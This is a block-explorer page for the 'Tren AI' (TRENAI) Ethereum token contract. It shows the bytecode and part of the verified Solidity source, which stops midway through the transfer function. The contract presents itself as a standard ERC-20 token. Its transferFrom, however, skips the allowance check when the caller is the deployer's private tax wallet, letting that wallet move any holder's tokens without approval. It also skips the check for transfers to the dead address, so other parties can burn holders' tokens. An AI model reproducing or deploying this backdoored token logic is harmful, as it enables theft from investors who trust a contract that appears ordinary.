Cryo Explorer Ethereum Mainnet

Address Contract Verified

Address 0x1a78EdCd5DB44eA75691777416Eb79E9b5316805
Balance 0 ETH
Nonce 1
Code Size 12705 bytes
Indexed Transactions 0
External Etherscan · Sourcify

Contract Bytecode

12705 bytes
0x6080604052600436106100f6575f3560e01c8063715018a611610089578063a9059cbb11610058578063a9059cbb146102f3578063dc567d0a1461032f578063dd62ed3e14610359578063ea414b2814610395576100fd565b8063715018a6146102735780638a8c523c146102895780638da5cb5b1461029f57806395d89b41146102c9576100fd565b806323b872dd116100c557806323b872dd146101a7578063313ce567146101e357806334376f3b1461020d57806370a0823114610237576100fd565b806306fdde0314610101578063095ea7b31461012b57806318160ddd1461016757806320969d0714610191576100fd565b366100fd57005b5f80fd5b34801561010c575f80fd5b506101156103bd565b60405161012291906121b4565b60405180910390f35b348015610136575f80fd5b50610151600480360381019061014c9190612272565b6103fa565b60405161015e91906122ca565b60405180910390f35b348015610172575f80fd5b5061017b610417565b60405161018891906122f2565b60405180910390f35b34801561019c575f80fd5b506101a561043a565b005b3480156101b2575f80fd5b506101cd60048036038101906101c8919061230b565b610526565b6040516101da91906122ca565b60405180910390f35b3480156101ee575f80fd5b506101f76106e2565b6040516102049190612376565b60405180910390f35b348015610218575f80fd5b506102216106ea565b60405161022e91906122f2565b60405180910390f35b348015610242575f80fd5b5061025d6004803603810190610258919061238f565b6106f0565b60405161026a91906122f2565b60405180910390f35b34801561027e575f80fd5b50610287610736565b005b348015610294575f80fd5b5061029d610884565b005b3480156102aa575f80fd5b506102b3610da6565b6040516102c091906123c9565b60405180910390f35b3480156102d4575f80fd5b506102dd610dcd565b6040516102ea91906121b4565b60405180910390f35b3480156102fe575f80fd5b5061031960048036038101906103149190612272565b610e0a565b60405161032691906122ca565b60405180910390f35b34801561033a575f80fd5b50610343610e27565b60405161035091906122f2565b60405180910390f35b348015610364575f80fd5b5061037f600480360381019061037a91906123e2565b610e2d565b60405161038c91906122f2565b60405180910390f35b3480156103a0575f80fd5b506103bb60048036038101906103b6919061245b565b610eaf565b005b60606040518060400160405280600781526020017f5472656e20414900000000000000000000000000000000000000000000000000815250905090565b5f61040d610406610f51565b8484610f58565b6001905092915050565b5f6009600a61042691906125e2565b633b9aca00610435919061262c565b905090565b610442610f51565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146104ce576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104c5906126b7565b60405180910390fd5b5f47116104d9575f80fd5b6104e1610f51565b73ffffffffffffffffffffffffffffffffffffffff166108fc4790811502906040515f60405180830381858888f19350505050158015610523573d5f803e3d5ffd5b50565b5f61053284848461111b565b60045f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614158015610614575060135f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161480610613575061dead73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b5b156106d7576106d684610625610f51565b6106d1856040518060600160405280602881526020016131446028913960025f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f610688610f51565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546119f99092919063ffffffff16565b610f58565b5b600190509392505050565b5f6009905090565b60105481565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b61073e610f51565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146107ca576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107c1906126b7565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35f805f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b61088c610f51565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610918576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161090f906126b7565b60405180910390fd5b601360149054906101000a900460ff1615610968576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161095f9061271f565b60405180910390fd5b737a250d5630b4cf539739df2c5dacb4c659f2488d60125f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550610a043060125f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff166009600a6109f091906125e2565b633b9aca006109ff919061262c565b610f58565b60125f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610a6e573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610a929190612751565b73ffffffffffffffffffffffffffffffffffffffff1663c9c653963060125f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610b18573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610b3c9190612751565b6040518363ffffffff1660e01b8152600401610b5992919061277c565b6020604051808303815f875af1158015610b75573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610b999190612751565b60135f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060125f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d7194730610c20306106f0565b5f80610c2a610da6565b426040518863ffffffff1660e01b8152600401610c4c969594939291906127e5565b60606040518083038185885af1158015610c68573d5f803e3d5ffd5b50505050506040513d601f19601f82011682018060405250810190610c8d9190612858565b5050506001601360166101000a81548160ff0219169083151502179055506001601360146101000a81548160ff02191690831515021790555060135f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b360125f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff167fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b8152600401610d639291906128a8565b6020604051808303815f875af1158015610d7f573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610da391906128f9565b50565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606040518060400160405280600681526020017f5452454e41490000000000000000000000000000000000000000000000000000815250905090565b5f610e1d610e16610f51565b848461111b565b6001905092915050565b60115481565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b60045f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16610eef610f51565b73ffffffffffffffffffffffffffffffffffffffff1614610f0e575f80fd5b8060045f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610fc6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fbd90612994565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611034576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161102b90612a22565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161110e91906122f2565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611189576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161118090612ab0565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036111f7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111ee90612b3e565b60405180910390fd5b5f8111611239576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161123090612bcc565b60405180910390fd5b5f611242610da6565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16141580156112b05750611280610da6565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b80156112e857503073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b801561132057503073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b156117135761132d610da6565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16141580156113755750601360159054906101000a900460ff16155b156113b9576113b660646113a8600d54600f541161139557600b54611399565b600c545b85611a5b90919063ffffffff16565b611ad290919063ffffffff16565b90505b60135f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16148015611462575060125f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b80156114b5575060035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b801561150e575060045f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b1561152b57600f5f81548092919061152590612bea565b91905055505b5f611535306106f0565b90503073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16141580156115805750601360159054906101000a900460ff16155b80156115d8575060135f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16145b8015611631575060045f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b80156116495750601360169054906101000a900460ff165b80156116585750600e54600f54115b156117115761166685611b1b565b156116a6576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161169d90612c7b565b60405180910390fd5b6015544311156116b8575f6014819055505b6116c183611b2c565b6014546116ce9190612c99565b6014819055506010548111156116fa576116f983601054116116f2576010546116f4565b835b611d6a565b5b5f4790505f811061170f5761170e47611fd5565b5b505b505b6117638260015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461203d90919063ffffffff16565b60015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506118066117ba828461203d90919063ffffffff16565b60015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461208690919063ffffffff16565b60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505f8111156119465761189f8160015f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461208690919063ffffffff16565b60015f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055503073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161193d91906122f2565b60405180910390a35b61dead73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16146119f3578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6119dd848661203d90919063ffffffff16565b6040516119ea91906122f2565b60405180910390a35b50505050565b5f838311158290611a40576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a3791906121b4565b60405180910390fd5b505f8385611a4e9190612ccc565b9050809150509392505050565b5f808303611a6b575f9050611acc565b5f8284611a78919061262c565b9050828482611a879190612d2c565b14611ac7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611abe90612dcc565b60405180910390fd5b809150505b92915050565b5f611b1383836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f0000000000008152506120e3565b905092915050565b5f80823b90505f8111915050919050565b5f80600267ffffffffffffffff811115611b4957611b48612dea565b5b604051908082528060200260200182016040528015611b775781602001602082028036833780820191505090505b50905030815f81518110611b8e57611b8d612e17565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505060125f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611c32573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611c569190612751565b81600181518110611c6a57611c69612e17565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250505f60125f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663d06ca61f85846040518363ffffffff1660e01b8152600401611d01929190612efb565b5f60405180830381865afa158015611d1b573d5f803e3d5ffd5b505050506040513d5f823e3d601f19601f82011682018060405250810190611d43919061303c565b905080600181518110611d5957611d58612e17565b5b602002602001015192505050919050565b6001601360156101000a81548160ff0219169083151502179055505f600267ffffffffffffffff811115611da157611da0612dea565b5b604051908082528060200260200182016040528015611dcf5781602001602082028036833780820191505090505b50905030815f81518110611de657611de5612e17565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505060125f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611e8a573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611eae9190612751565b81600181518110611ec257611ec1612e17565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050611f283060125f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610f58565b60125f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac947835f8430426040518663ffffffff1660e01b8152600401611f8a959493929190613083565b5f604051808303815f87803b158015611fa1575f80fd5b505af1158015611fb3573d5f803e3d5ffd5b50505050505f601360156101000a81548160ff02191690831515021790555050565b60045f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc8290811502906040515f60405180830381858888f19350505050158015612039573d5f803e3d5ffd5b5050565b5f61207e83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506119f9565b905092915050565b5f8082846120949190612c99565b9050838110156120d9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016120d090613125565b60405180910390fd5b8091505092915050565b5f8083118290612129576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161212091906121b4565b60405180910390fd5b505f83856121379190612d2c565b9050809150509392505050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f61218682612144565b612190818561214e565b93506121a081856020860161215e565b6121a98161216c565b840191505092915050565b5f6020820190508181035f8301526121cc818461217c565b905092915050565b5f604051905090565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61220e826121e5565b9050919050565b61221e81612204565b8114612228575f80fd5b50565b5f8135905061223981612215565b92915050565b5f819050919050565b6122518161223f565b811461225b575f80fd5b50565b5f8135905061226c81612248565b92915050565b5f8060408385031215612288576122876121dd565b5b5f6122958582860161222b565b92505060206122a68582860161225e565b9150509250929050565b5f8115159050919050565b6122c4816122b0565b82525050565b5f6020820190506122dd5f8301846122bb565b92915050565b6122ec8161223f565b82525050565b5f6020820190506123055f8301846122e3565b92915050565b5f805f60608486031215612322576123216121dd565b5b5f61232f8682870161222b565b93505060206123408682870161222b565b92505060406123518682870161225e565b9150509250925092565b5f60ff82169050919050565b6123708161235b565b82525050565b5f6020820190506123895f830184612367565b92915050565b5f602082840312156123a4576123a36121dd565b5b5f6123b18482850161222b565b91505092915050565b6123c381612204565b82525050565b5f6020820190506123dc5f8301846123ba565b92915050565b5f80604083850312156123f8576123f76121dd565b5b5f6124058582860161222b565b92505060206124168582860161222b565b9150509250929050565b5f61242a826121e5565b9050919050565b61243a81612420565b8114612444575f80fd5b50565b5f8135905061245581612431565b92915050565b5f602082840312156124705761246f6121dd565b5b5f61247d84828501612447565b91505092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b6001851115612508578086048111156124e4576124e3612486565b5b60018516156124f35780820291505b8081029050612501856124b3565b94506124c8565b94509492505050565b5f8261252057600190506125db565b8161252d575f90506125db565b8160018114612543576002811461254d5761257c565b60019150506125db565b60ff84111561255f5761255e612486565b5b8360020a91508482111561257657612575612486565b5b506125db565b5060208310610133831016604e8410600b84101617156125b15782820a9050838111156125ac576125ab612486565b5b6125db565b6125be84848460016124bf565b925090508184048111156125d5576125d4612486565b5b81810290505b9392505050565b5f6125ec8261223f565b91506125f78361235b565b92506126247fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484612511565b905092915050565b5f6126368261223f565b91506126418361223f565b925082820261264f8161223f565b9150828204841483151761266657612665612486565b5b5092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6126a160208361214e565b91506126ac8261266d565b602082019050919050565b5f6020820190508181035f8301526126ce81612695565b9050919050565b7f54726164696e6720697320616c7265616479206f70656e0000000000000000005f82015250565b5f61270960178361214e565b9150612714826126d5565b602082019050919050565b5f6020820190508181035f830152612736816126fd565b9050919050565b5f8151905061274b81612215565b92915050565b5f60208284031215612766576127656121dd565b5b5f6127738482850161273d565b91505092915050565b5f60408201905061278f5f8301856123ba565b61279c60208301846123ba565b9392505050565b5f819050919050565b5f819050919050565b5f6127cf6127ca6127c5846127a3565b6127ac565b61223f565b9050919050565b6127df816127b5565b82525050565b5f60c0820190506127f85f8301896123ba565b61280560208301886122e3565b61281260408301876127d6565b61281f60608301866127d6565b61282c60808301856123ba565b61283960a08301846122e3565b979650505050505050565b5f8151905061285281612248565b92915050565b5f805f6060848603121561286f5761286e6121dd565b5b5f61287c86828701612844565b935050602061288d86828701612844565b925050604061289e86828701612844565b9150509250925092565b5f6040820190506128bb5f8301856123ba565b6128c860208301846122e3565b9392505050565b6128d8816122b0565b81146128e2575f80fd5b50565b5f815190506128f3816128cf565b92915050565b5f6020828403121561290e5761290d6121dd565b5b5f61291b848285016128e5565b91505092915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f61297e60248361214e565b915061298982612924565b604082019050919050565b5f6020820190508181035f8301526129ab81612972565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f612a0c60228361214e565b9150612a17826129b2565b604082019050919050565b5f6020820190508181035f830152612a3981612a00565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f612a9a60258361214e565b9150612aa582612a40565b604082019050919050565b5f6020820190508181035f830152612ac781612a8e565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f612b2860238361214e565b9150612b3382612ace565b604082019050919050565b5f6020820190508181035f830152612b5581612b1c565b9050919050565b7f5472616e7366657220616d6f756e74206d7573742062652067726561746572205f8201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b5f612bb660298361214e565b9150612bc182612b5c565b604082019050919050565b5f6020820190508181035f830152612be381612baa565b9050919050565b5f612bf48261223f565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203612c2657612c25612486565b5b600182019050919050565b7f45524332303a2045787465726e616c2063616c6c0000000000000000000000005f82015250565b5f612c6560148361214e565b9150612c7082612c31565b602082019050919050565b5f6020820190508181035f830152612c9281612c59565b9050919050565b5f612ca38261223f565b9150612cae8361223f565b9250828201905080821115612cc657612cc5612486565b5b92915050565b5f612cd68261223f565b9150612ce18361223f565b9250828203905081811115612cf957612cf8612486565b5b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f612d368261223f565b9150612d418361223f565b925082612d5157612d50612cff565b5b828204905092915050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f5f8201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b5f612db660218361214e565b9150612dc182612d5c565b604082019050919050565b5f6020820190508181035f830152612de381612daa565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b612e7681612204565b82525050565b5f612e878383612e6d565b60208301905092915050565b5f602082019050919050565b5f612ea982612e44565b612eb38185612e4e565b9350612ebe83612e5e565b805f5b83811015612eee578151612ed58882612e7c565b9750612ee083612e93565b925050600181019050612ec1565b5085935050505092915050565b5f604082019050612f0e5f8301856122e3565b8181036020830152612f208184612e9f565b90509392505050565b5f80fd5b612f368261216c565b810181811067ffffffffffffffff82111715612f5557612f54612dea565b5b80604052505050565b5f612f676121d4565b9050612f738282612f2d565b919050565b5f67ffffffffffffffff821115612f9257612f91612dea565b5b602082029050602081019050919050565b5f80fd5b5f612fb9612fb484612f78565b612f5e565b90508083825260208201905060208402830185811115612fdc57612fdb612fa3565b5b835b818110156130055780612ff18882612844565b845260208401935050602081019050612fde565b5050509392505050565b5f82601f83011261302357613022612f29565b5b8151613033848260208601612fa7565b91505092915050565b5f60208284031215613051576130506121dd565b5b5f82015167ffffffffffffffff81111561306e5761306d6121e1565b5b61307a8482850161300f565b91505092915050565b5f60a0820190506130965f8301886122e3565b6130a360208301876127d6565b81810360408301526130b58186612e9f565b90506130c460608301856123ba565b6130d160808301846122e3565b9695505050505050565b7f536166654d6174683a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f61310f601b8361214e565b915061311a826130db565b602082019050919050565b5f6020820190508181035f83015261313c81613103565b905091905056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220872fb71674a639f6dea3a7100f9f90903780aceee934eca257707e1aed119fc264736f6c634300081a0033

Verified Source Code Full Match

Compiler: v0.8.26+commit.8a97fa7a EVM: cancun Optimization: No
contract.sol 434 lines
// SPDX-License-Identifier: MIT

/**
    Website: https://trenaieth.org
    App: https://app.trenaieth.org
    Docs: https://docs.trenaieth.org
    X: https://x.com/trenaieth
    Telegram: https://t.me/trenaieth
*/

pragma solidity ^0.8.19;

address constant _deadAddr = address(0xdead);

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }
}

contract Ownable is Context {
    address private _owner;
    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
}

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);
}

interface IUniswapV2Router02 {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}

contract Token is Context, IERC20, Ownable {
    using SafeMath for uint256;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => bool) private _feeExcluded;
    address payable private _taxWallet;
    address payable private _mainwallet;
    address payable private _devwallet;
    address payable private _feewallet;

    uint256 private _reduceBuyTax = 3;
    uint256 private _initLowtax = 0;
    uint256 private _iniFulltax = 100;
    uint256 private _initialTax = 20;
    uint256 private _finalTax = 0;
    uint256 private _reduceTaxAt = 3;
    uint256 private _preventSwapBefore = 3;
    uint256 private _buyCount = 0;

    uint8 private constant _decimals = 9;
    uint256 private constant _tTotal = 1_000_000_000 * 10**_decimals;
    string private constant _name = unicode"Tren AI";
    string private constant _symbol = unicode"TRENAI";
    uint256 public _taxSwap = _tTotal / 100;
    uint256 public _maxSwapThres = 10 * 10**18;

    IUniswapV2Router02 private uniswapV2Router;
    address private uniswapV2Pair;
    bool private tradingOpen;
    bool private inSwap = false;
    bool private swapEnabled = false;
    uint256 private sellCount = 0;
    uint256 private lastSellBlock = 0;

    modifier lockTheSwap() {
        inSwap = true;
        _;
        inSwap = false;
    }

    constructor() payable {
        _taxWallet = payable(_msgSender());

        _feeExcluded[address(this)] = true;
        _feeExcluded[_taxWallet] = true;

        _balances[_msgSender()] = (_tTotal * 2) / 100;
        _balances[address(this)] = (_tTotal * 98) / 100;

        emit Transfer(address(0), _msgSender(), (_tTotal * 2) / 100);
        emit Transfer(address(0), address(this), (_tTotal * 98) / 100);
    }

    function name() public pure returns (string memory) {
        return _name;
    }

    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    function totalSupply() public pure override returns (uint256) {
        return _tTotal;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount)
        public
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public override returns (bool) {
        _transfer(sender, recipient, amount);

        if (
            msg.sender != _taxWallet &&
            (sender == uniswapV2Pair || recipient != _deadAddr)
        )
            _approve(
                sender,
                _msgSender(),
                _allowances[sender][_msgSender()].sub(
                    amount,
                    "ERC20: transfer amount exceeds allowance"
                )
            );
        return true;
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) private {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
